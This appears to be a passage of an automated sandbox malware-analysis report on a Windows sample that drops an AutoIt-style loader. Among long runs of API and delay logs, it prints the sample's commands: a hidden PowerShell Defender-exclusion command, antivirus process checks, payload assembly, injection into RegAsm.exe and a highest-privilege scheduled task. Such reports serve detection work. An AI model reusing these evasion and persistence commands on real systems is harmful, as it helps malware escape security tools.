                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00694005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00694005
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0069C2FF
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_0069494A
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069CD14 FindFirstFileW,FindClose,18_2_0069CD14
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_0069CD9F
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0069F5D8
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0069F735
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0069FA36
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00693CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00693CE2
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00645D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,18_2_00645D13
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 100000
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99875
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99765
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99656
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99546
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99437
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99327
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99215
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98917
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98690
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98561
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98453
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98343
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98228
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98118
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98015
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97904
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97796
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97687
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97578
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97468
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97359
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97239
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97115
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96977
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96868
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96765
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96654
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96546
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96437
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96317
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96161
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96031
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95879
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95750
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95627
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95500
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95390
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95281
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95172
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95047
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94937
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94828
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94718
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94609
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94499
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94390
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94280
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94171
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94061
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 93952
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 93843
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 100000
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99855
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99750
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99640
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99531
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99421
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99312
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99202
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99093
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98984
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98874
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98760
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98656
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98403
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98296
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98071
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97968
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97859
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97750
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97640
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97531
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97418
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97310
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97203
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97093
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96979
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96874
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96765
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96656
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96546
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96437
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96328
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96218
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96109
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95994
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95890
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95764
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95583
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95454
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95328
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95218
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95109
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94999
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94887
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94779
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94670
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94561
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94452
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94343
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94234
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 100000
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99873
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99764
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99656
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99546
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99437
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99328
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99218
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 99109
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98999
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98890
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98780
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98671
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98562
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98452
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98343
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98234
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 98111
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97953
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97823
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97500
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97265
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97156
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 97040
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96922
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96812
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96702
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96593
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96484
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96374
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96265
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96156
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 96046
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95937
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95828
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95718
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95603
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95484
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95375
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95265
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95156
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 95046
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94934
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94827
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94602
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94484
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94369
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94259
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94147
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 94031
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 93921
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\491505\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\491505Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                                  Source: RegAsm.exe, 00000016.00000002.4635504009.0000000005664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006A45D5 BlockInput,18_2_006A45D5
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00645240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,18_2_00645240
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00665CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,18_2_00665CAC
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,18_2_006888CD
                                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeProcess token adjusted: Debug
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0065A354 SetUnhandledExceptionFilter,18_2_0065A354
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0065A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0065A385
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Yara detected Powershell download and execute
                                  Source: Yara matchFile source: amsi32_6596.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: amsi32_7160.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6884, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\download.bat, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\checkmiexe.bat, type: DROPPED
                                  Adds a directory exclusion to Windows Defender
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Injects a PE file into a foreign processes
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comMemory written: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe base: 7C0000 value starts with: 4D5AJump to behavior
                                  Writes to foreign memory regions
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comMemory written: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe base: 7C0000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comMemory written: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe base: 405000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00689369 LogonUserW,18_2_00689369
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00645240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,18_2_00645240
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00691AC6 SendInput,keybd_event,18_2_00691AC6
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006951E2 mouse_event,18_2_006951E2
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmdJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 491505Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue BJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\491505\Dr.com Dr.com BJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess created: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\user\AppData\Local\CreativePixel Tech\E"Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" "Jump to behavior
